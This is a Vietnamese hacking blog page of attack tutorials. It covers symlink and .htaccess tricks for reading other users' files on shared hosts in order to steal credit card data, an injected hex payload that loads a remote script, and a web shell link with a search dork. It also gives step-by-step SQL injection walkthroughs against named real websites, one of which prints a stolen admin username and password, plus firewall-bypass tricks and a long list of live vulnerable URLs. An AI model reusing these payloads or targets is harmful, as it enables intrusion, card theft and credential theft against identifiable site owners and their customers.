có shop thì có thể xem đc cc mã hóa qua admin,có shop thì k lưu lại cc nên phương pháp hack = shell này nhanh gọn lẹ nhất
readmore...

Symljnk bypass view file.php

Cpanel (:2082)

ln -s / dmx.txt
tar -zcvf cpanel_dmx.tar.gz 
direct admin(:2222)
ln -s / r00t
tar -zcvf direct_r00t.tar.gz r00t
có quyền login host và giải nén thư mục ra
chạy trên address
cpanel : http://shell_on_this_host_/dmx.txt/home/user_victim/public_html/index.php
direct : r00t/home/user_victim/domains/public_html/index.php

.htaccess

Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php 
con .htaccess này có chức năng show ra các file.php dưới dạng file text
nên cho dù permisson thư mục nhưng đên file này vẫn có thể view
hoặc show ra cả file.html
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any 
Download : http://www.mediafire.com/?bt7x83mj8qzpx92
readmore...

Video Hack CC cho Newbie :P

Download : http://www.mediafire.com/?drhi5o3nsc9tblt

concat((0x3c736372697074207372633d22687474703a2f2f6d756173756e67323031322e636f6d2f73716c2e6a73223e3c2f7363726970743e))
readmore...

UpLoad Shell PHPMyadmin

Shell : http://121.247.167.36:9292/tmt6.php
Dork google :inurl:/phpmyadmin/sql.php?
Video : http://www.mediafire.com/?463c3r7k33f1vzx
readmore...

Chủ Nhật, 8 tháng 7, 2012

[TUT] - Bypass SafeMode sử dụng Python

readmore...

[TUT]Khai thác site SQL HTML (php biến dạng)

Khai thác sql không phải là php nữa mà là HTML.

victim lần này là:
HTML Code:
http://www.worldwidehealthcenter.net/articles-261.html
Thêm dấu ' vào sau những con số
HTML Code:
http://www.worldwidehealthcenter.net/articles-261'.html
haha lỗi rồi

Quote:
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/whc/www/articles.php on line 16

Warning: Cannot modify header information - headers already sent by (output started at /home/whc/www/articles.php:16) in /home/whc/www/include.php on line 432
Bắt đầu order by
HTML Code:
http://www.worldwidehealthcenter.net/articles-261 order by 1-- -.html
>>ok
HTML Code:
http://www.worldwidehealthcenter.net/articles-261 order by 7-- -.html
>> ok
HTML Code:
http://www.worldwidehealthcenter.net/articles-261 order by 8-- -.html
>> bao loi

>>8-1=7 nhé

bây h union select :
HTML Code:
http://www.worldwidehealthcenter.net/articles-261 union select 1,2,3,4,5,6,7-- -.html
ui số má đâu hết rồi: , view source , chẳng thấy gì hết chán.

Ghét quá thay số bằng null xem 261=null

http://www.worldwidehealthcenter.net/articles-null union select 1,2,3,4,5,6,7-- -.html

ui ra rồi 2 và 3 nhé

Tìm các thông tin :version(),database(),user()

HTML Code:
http://www.worldwidehealthcenter.net/articles-null union select 1,2,version(),4,5,6,7-- -.html
Tiếp theo tìm table name
HTML Code:
http://www.worldwidehealthcenter.net/articles-null union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()-- -.html
1 đống :
Quote:
adprice,artcat,articles,banners,brands,bulktemp,ca tegories,clickthrus,concerns,countries,directory,d irectorybak,directorystats,discount,distributorord er,emailaddresses,exchange,iptoc,keywords,loyalty, member,memberbak,memberbak2,message,ocountries,ord eritems,orders,ordersbak,postal,practcat,products, productsbak,purchaseorders,retaildiscount,ship,shi pdiscount,shipping,states,static,subscribers,suppl iers
Tìm table chứa thông tin

Ở đây nhìu cái quá mình loạn, thôi mình tìm table member nhé
member=0x6d656d626572 (conver to hex nhé)
get column

HTML Code:
http://www.worldwidehealthcenter.net/articles-null   union select 1,2,group_concat(column_name),4,5,6,7 from   information_schema.columns where table_schema=database() and   table_name=0x6d656d626572-- -.html
lại ra 1 đống :
Quote:
id,password,email,title,firstname,surname,company, address,city,state,postal,shoppercountry,tel,fax,s ameshipadd,shiptitle,shipfirstname,shipsurname,shi pcompany,shipaddress,shipcity,shipstate,country,sh ippostal,shiptel,shipfax,advertise,dateemailed,typ e
readmore...

[TUT] - SQL - Startourvn.com

Download: http://www.mediafire.com/?pu6e1s4jtfkphhn

Pass Unlock: vnhack
readmore...

[TUT] - Hack via MySQLDumper


Download: http://www.mediafire.com/?246qg078me46nio

Pass Unlock: vnhack
readmore...

[TUT]SQLI (căn bản)

bước 1:/ đương nhiên check site lỗi sqli nhưng làm sao để check? đơn giản chỉ cần thêm ' or '' or # tùy vào mọi lúc thui

Victim:http://www.xzs.gov.cn/productdetail.php?ID=10

ok ta thêm ' dzo nào

http://www.xzs.gov.cn/productdetail.php?ID=10'

ok nó sẽ bất thường phải ko

bước 2/ta order by ra để bik số nó lỗi ở đâu

http://www.xzs.gov.cn/productdetail.php?ID=10

http://www.xzs.gov.cn/productdetail.php?ID=10 order by 1<=không lỗi

http://www.xzs.gov.cn/productdetail.php?ID=10 order by 10<=không lỗi

http://www.xzs.gov.cn/productdetail.php?ID=10 order by 100<= không lỗi @@ diss @@ vậy thử cách khác bằng cách như sau

http://www.xzs.gov.cn/productdetail.php?ID=10' group by 1-- -<=không lỗi
http://www.xzs.gov.cn/productdetail.php?ID=10' group by 2-- -<=không lỗi
http://www.xzs.gov.cn/productdetail.php?ID=10' group by 3-- -<=không lỗi

.... order tự mình đi mệt quá

http://www.xzs.gov.cn/productdetail.php?ID=10' group by 12-- -<=không

http://www.xzs.gov.cn/productdetail.php?ID=10' group by 13-- -<=ok thấy sự bất thường rùi phải ko

3/ta union select nó nào

nhớ thêm - đằng sau id= nhé

www.xzs.gov.cn/productdetail.php?ID=-10 union select 1,2,3,4,5,6,7,8,9,10,11,12-- -

không ra số lỗi rùi thử cách khác vậy

www.xzs.gov.cn/productdetail.php?ID=-10' union select 1,2,3,4,5,6,7,8,9,10,11,12-- -

ok nó ra số 2 8 9 10 11 6 và mấy số đó là để chúng ta get table+version() vân vân

4/ta check thử verison nó

www.xzs.gov.cn/productdetail.php?ID=-10' UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11,12-- -

oh 5.6.2-m5 có khi version 4. trở lên thì guess table thui @@

5/ khai thác table nó

bằng cách add

www.xzs.gov.cn/productdetail.php?ID=-10' UNION SELECT 1,version(),3,4,5,6,7,CONVERT(group_concat(table_n ame) USING latin1),9,10,11,12 from information_schema.tables where table_schema=database()-- -

ok nó ra 1 đống table rùi vậy ta sẽ check user +admin nó nhưng đa số là
:Admin,User,Users,Manager Ctril+f lên rùi tự coi

ok table nó là vn_adminusers
(hmm gov.cn mà nó đi để vn_adminusers .. thằng này nó yêu nước vn mình )

6/check columns nó nào

www.xzs.gov.cn/productdetail.php?ID=-10' UNION SELECT 1,version(),3,4,5,6,7,CONVERT(group_concat(column_ name) USING latin1),9,10,11,12 from information_schema.columns where table_schema=database() and table_name=0x766e5f61646d696e7573657273 -- -

=0x766e5f61646d696e7573657273 nhiều người hỏi cái này là gì cái này là hex của nó bằng cách vào site
http://string-functions.com/string-hex.aspx và chỗ enter cho cái table user or admin dzo rùi convert nó là có số ở dưới copy và paste dzo

Nhưng nhớ là phải có =0x nhé

ok adminuser_id,adminuser_name,adminuser_pass,adminus er_loginnum,adminuser_lastlogintime,adminuser_last loginip nó ra mấy table này vậy ta cùng get nào

7/get user+pass

www.xzs.gov.cn/productdetail.php?ID=-10' UNION SELECT 1,version(),3,4,5,6,7,CONVERT(group_concat(adminus er_id,0x2f,adminuser_name,0x2f,adminuser_pass) USING latin1),9,10,11,12 from vn_adminusers-- -

0x2f:là / cho dễ nhìn ấy

ok user+pass nó là : 1/mfykziwu/che173nxiao


8/get link admin

vậy chúng ta get bằng gì? off coz bằng tools rùi

tui thích nhất tools này


9/ không get dc admin vì chmod mẹ rùi nhưng thui tới đây hết chắc anh em cũng đủ hiểu

Hướng dẫn Bypass 1 số lỗi thường gặp:

Loại 403,406:
hi ta order by thành công , nhưng union select lại xuất hiện những dòng thông báo sau:
Quote:

406 Not Acceptable

This request is not acceptable Powered By LiteSpeed Web Server
LiteSpeed Technologies is not responsible for administration and contents of this web site!

Quote:

Forbidden

You don't have permission to access /htmls/recruitment_detail.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.vinaplast.com.vn Port 80

Quote:

Not Acceptable

An appropriate representation of the requested resource /detClientes.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.



Để vượt qua được cái này, thì chúng ta cần phải bypass nó, nếu bypass vượt qua xem như site này 90% là đã xong với mình
Sau đây là một số cách vượt qua:
Cách 1 : tùy biến union select
Tùy biến ở đây là các bạn điều chỉnh chữ HOA, chữ THƯỜNG, HOA THƯỜNG xen kẽ nhau
Cách 2: Thêm comment /*!...*/ , /*!50000...*/
Cách 3: Dùng encode URL, cách dùng như sau
ví dụ : ta encode union ,nhưng ta chỉ encode 1 phần hoặc tất cả chữ cái có trong union.
ta chỉ việc HEX nó và thêm đằng trước là %, chú ý là % chứ ko phải 0x đâu nhé

Cách 4: là khi xuất hiện khoảng trắng nó sẽ báo lỗi, ta thay khoảng trắng bằng dấu +, và 1 số trường hợp ta thay bằng : %0A,%0B,%0C,%0D,%09,%20...
Cách 5 : Kết hợp 4 cách trên lại với nhau
Cách 6: tự chế

Mẹo vặt để tìm ra từ khóa bị MOD_security:
Khi bypass union select thành công thì tới đoạn get table_name. Đoạn get table_name chắc chắn các bạn sẽ gặp trở ngại vì nó tiếp tục thông báo lỗi, do đó cách thức vựot qua cái này như sau :
Vi dụ site.com?tghmmd=1 order by 7-- - là ok. Và Union select ta đã bypass và cho ra số 3
Quote:

>>union select 1,2,3,4,5,6,7-- -

+Get table_name ta chưa vội thay table_name vào làm gì, mà thêm vào "from information_schema.tables" trước>> sẽ thành
Quote:

union select 1,2,3,4,5,6,7 from information_schema.tables-- -

Nếu nó báo lỗi thì hầu hết bypass như sau:
Thay tables = /*!table*/=/*!50000tables*/ hoặc from= /*!from*/=/*!50000from*/
Nếu nó ko báo lỗi thì ta đi tiếp,và thêm đoạn where table_schema=database()
-Nếu lại báo lỗi thì bypass như sau
Thay where=/*!where*/=/*!50000where*/ Hoặc = bằng like
Chú ý chỗ này, cái database() ,khi mà tìm version() mà nó chặn() thì chú ý chỗ này ta dùng tên cái database nhé

>>Khi đã thêm xong mà số column lỗi là 3 vẫn hiện ra là ta bypass ok rồi. Bây h chỉ việc thay cái table_name vào số 3 nữa là ok.
Nếu lỗi thì tiếp tục bypass như trên
table_name = /*!table_name*/ = /*!50000table_name*/


(nói chung SQLI phải biết biến hóa )
readmore...

[TUT] Lỗi Jet Database Cho Newbie

Đây là dạng lỗi SQL mà khai thác dễ nhất nhưng đòi hỏi có 1 chút kinh nghiệm trong quá trình khái thác vì phải đoán table và column

Victim hôm nay là:
http://thanhancamera.com/news.asp?tin_ID=86

Bước 1: Check lỗi


Thêm dấu’ vào cuối đường link url, nếu site dính lỗi sẽ xuất hiện thông báo như sau:
http://thanhancamera.com/news.asp?tin_ID=86’


Quote:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'tin_ID=86 ''.

/news.asp, line 16
Bước 2: Tìm số trường cột


http://thanhancamera.com/news.asp?tin_ID=86 order by 1 -> Site bình thường
http://thanhancamera.com/news.asp?tin_ID=86 order by 6 -> Site bình thường
http://thanhancamera.com/news.asp?tin_ID=86 order by 7 -> Xuất hiện lỗi

Quote:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine does not recognize '7' as a valid field name or expression.

/news.asp, line 16



Số cột cần tìm là 6



Bước 3: Đoán tên table

Một số tables chứa thông tin admin và password như:

tb_admin, tbl_admin, tbl_user, tbl_users, tbluser, user, admin, …..

Ở dạng này theo kinh nghiệm khai thác thì table_name phổ biến nhất vẫn là tb_admin,.... tóm lại phải biến hóa trong tìm kiếm
Nếu site hoạt động bình thường và xuất hiện nhưng con số, chứng tỏ table được đoán là chính xác. Những con số được xuất hiện chính là vị trí table bị lỗi. Chúng ta có thể khai thác bằng cách chèn các mã lệnh tại vị trí đó.
Còn không site sẽ xuất hiện lỗi như sau:

Quote:
Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query 'tbl_user'. Make sure it exists and that its name is spelled correctly.
/news.asp, line 16

http://thanhancamera.com/news.asp?tin_ID=-86 UNION SELECT 1,2,3,4,5,6 from tb_admin




Trong trường hợp này các tables ở vị trí 1,2,3,4 bị lỗi. Chúng ta có thể khai thác tại những vị trí đó.thử sẽ check ở vị trí thứ 2 và 3

Bước 4: Đoán tên column

Một số columns chứa thông tin admin và password như:
Username-password, uid-pwd….
Ở dạng này phổ biến nhất vẫn là : username,password


http://thanhancamera.com/news.asp?tin_ID=-86 UNION SELECT 1,2,username,password,5,6 from tb_admin











Nếu xuất hiện thông tin tại vị trí được khai thác như trên, chứng tỏ column được đoán là chính xác

Username: nothing , password: hacked
có vẻ admin thích bị hack

Bước 5: Tìm đường link loggin admin

Một số tool sử dụng để tìm link admin như: havij, admin finder, web admin finder.
mình thì cứ bằng tay để đoán dựa vào kinh nghiệm:

http://thanhancamera.com/login.asp


chúng ta có thể tìm được các site dính lỗ hổng Jet và khai thác tương tư:

http://www.gimec.com.vn/news.asp?tin_ID=114’
http://www.mailan.com.vn/news.asp?tin_ID=57
http://thanhancamera.com/news.asp?tin_ID=86
www.caosuqtri.com.vn/news.asp?tin_ID=70
http://www.indochinaclassic.com/tintuc.asp?id=181’
http://gimec.com.vn/news.asp?tin_ID=75
http://www.ecma.ca/news.asp?id=191
http://www.mailan.com.vn/news.asp?tin_ID=53’
http://www.qhcc.ttuni.edu.vn/news.asp?tin_ID=15’
http://www.soldtbxhbinhdinh.vn/Detai...?Tin_ID=208%27
http://www.viethand.com.vn/news.asp?tin_ID=605%27
http://www.shopchiem.com/news.asp?tin_ID=139%27
http://thanhancamera.com/news.asp?tin_ID=104%27
http://gimec.com.vn/news.asp?tin_ID=73%27
http://www.donoithat.com.vn/news.asp?tin_ID=23
http://www.mailan.com.vn/news.asp?tin_ID=52%27
http://vinhthinhco.com/news.asp?tin_ID=105%27
http://chausonren.somee.com/tintuc.asp?tin_ID=37%27
http://www.soldtbxhbinhdinh.vn/Detai...?Tin_ID=198%27
http://www.vinabatech.com/vietnam/news.asp?tin_ID=68%27
http://www.inhagia.com/news.asp?tin_ID=58%27
http://in-hagia.com/news.asp?tin_ID=60%27
http://trunghocthuysan.edu.vn/news.asp?tin_ID=84%27
http://www.dqjewellery.vn/tuyendung.asp?tin_ID=65%27
http://www.viethand.com.vn/news.asp?tin_ID=425%27
http://lythanh.net/news.asp?tin_ID=41%27
http://hoaphong.com.vn/tintuc.asp?tin_ID=14%27
http://www.namthai.vn/news.asp?tin_ID=89%27
http://nguyenbinhit.tk/news.asp?tin_ID=59%27
http://gimec.com.vn/news.asp?tin_ID=74%27
http://donoithat.com.vn/news.asp?tin_ID=9%27
http://ngockhang.com.vn/news.asp?tin_ID=174%27
http://vinhthinhco.com/news.asp?tin_ID=101%27
http://www.qhcc.ttuni.edu.vn/news.asp?tin_ID=14%27
http://viengiamdinhphapytamthantu.co...p?tin_ID=11%27
http://www.chausonren.somee.com/tintuc.asp?tin_ID=52%27
http://j.1asphost.com/tdssvn/tdss/news.asp?tin_ID=53%27
http://inhagia.com/news.asp?tin_ID=59%27
http://www.viethand.com.vn/news.asp?tin_ID=422%27
http://www.namthai.vn/news.asp?tin_ID=90%27
http://trunghocthuysan.edu.vn/news.asp?tin_ID=111%27
http://www.viethand.com.vn/news.asp?tin_ID=422%27
http://cntt.ttuni.edu.vn/news.asp?tin_ID=20%27
http://ngockhang.com.vn/tindt.asp?tin_ID=73%27
http://www.dqjewellery.vn/news.asp?tin_id=74%27
http://ngockhang.com.vn/news.asp?tin_ID=181%27
http://lythanh.net/news.asp?tin_ID=47%27
http://hoaphong.com.vn/tintuc.asp?tin_ID=15%27
http://viengiamdinhphapytamthantu.co...p?tin_ID=22%27
http://www.soldtbxhbinhdinh.vn/Detai...?Tin_ID=201%27
http://vinhthinhco.com/news.asp?tin_ID=102%27
http://shopchiem.com/news.asp?tin_ID=308%27
http://gimec.com.vn/news.asp?tin_ID=%27
http://minhduccomec.com.vn/vna/news.asp?tin_ID=34%27
http://www.inhagia.com/news.asp?tin_ID=57%27
http://cc.1asphost.com/nhom7/news.asp?tin_ID=56%27
http://thanhancamera.com/news.asp?tin_ID=94%27
http://ngockhang.com.vn/news.asp?tin_ID=176%27
http://viengiamdinhphapytamthantu.co...sp?tin_ID=9%27
http://shopchiem.com/news.asp?tin_ID=303%27
http://gimec.com.vn/news.asp?tin_ID=66%27
http://www.caosuqtri.com.vn/news.asp?tin_ID=70
http://www.mailan.com.vn/news.asp?tin_ID=57
http://thanhancamera.com/news.asp?tin_ID=86
http://www.viethand.com.vn/news.asp?tin_ID=605
http://chausonren.somee.com/tintuc.asp?tin_ID=37
readmore...